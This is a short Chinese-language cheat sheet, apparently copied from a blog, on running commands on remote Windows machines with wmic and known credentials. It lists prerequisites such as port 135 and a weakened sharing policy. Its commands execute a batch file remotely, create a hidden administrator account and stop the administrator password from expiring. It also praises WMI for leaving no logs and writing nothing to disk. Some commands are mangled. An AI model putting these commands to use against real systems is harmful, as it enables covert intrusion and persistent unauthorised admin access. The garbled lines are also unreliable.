先决条件:
1, 远程服务器启动 Windows Management Instrumentation 服务, 开放 TCP135 端口, 防火墙放开对此端口的流量 (默认放开);
2, 远程服务器的本地安全策略的 "网络访问: 本地帐户的共享和安全模式" 应设为 "经典 - 本地用户以自己的身份验证"
3, 已知远程服务器或者主机的账号密码
wmic /node:"192.168.1.20″ /user:"domain\administrator"/password:"123456″
### wmic
WMI 的全称是 Windows Management Instrumentation, 它出现在所有的 Windows 操作系统中, 并由一组强大的工具集合组成, 用于管理本地或远程的 Windows 系统, 攻击者使用 wmi 来进行攻击, 但 Windows 系统默认不会在日志中记录这些操作, 可以做到无日志, 攻击脚本无需写入到磁盘, 增加了隐蔽性. 推荐使用 wmic 进行远程执行命令.
常用命令
在远程系统上执行 bat 脚本
wmic /node:192.168.17.138 /user:test /password:[email protected]#123QWE process call create c:\programdata\test.bat
在远程系统上执行单条命令
wmic /node:192.168.17.138 /user:test /password:[email protected]#123QWE process call create "cmd.exe /c.NET user test1 [email protected]#123QWE /add && net localgroup administrators test1 /add
工具说明
1, 需要远程系统启动 Windows Management Instrumentation 服务, 开放 135 端口
2, 远程系统的本地安全策略的 "网络访问: 本地帐户的共享和安全模式" 应设为 "经典 - 本地用户以自己的身份验证"
3,wmic 会以管理员权限在远程系统上执行命令
4, 防火墙开启将无法连接
5, 如果报错 "Invalid Global Switch" , 用双引号把包含 - 的结点括起来即可正常执行.
wmic 设置密码永不过期
- wmic useraccount
- where
- name
- =
- "administrator"
- set passwordexpires=false
来源: http://www.bubuko.com/infodetail-3165604.html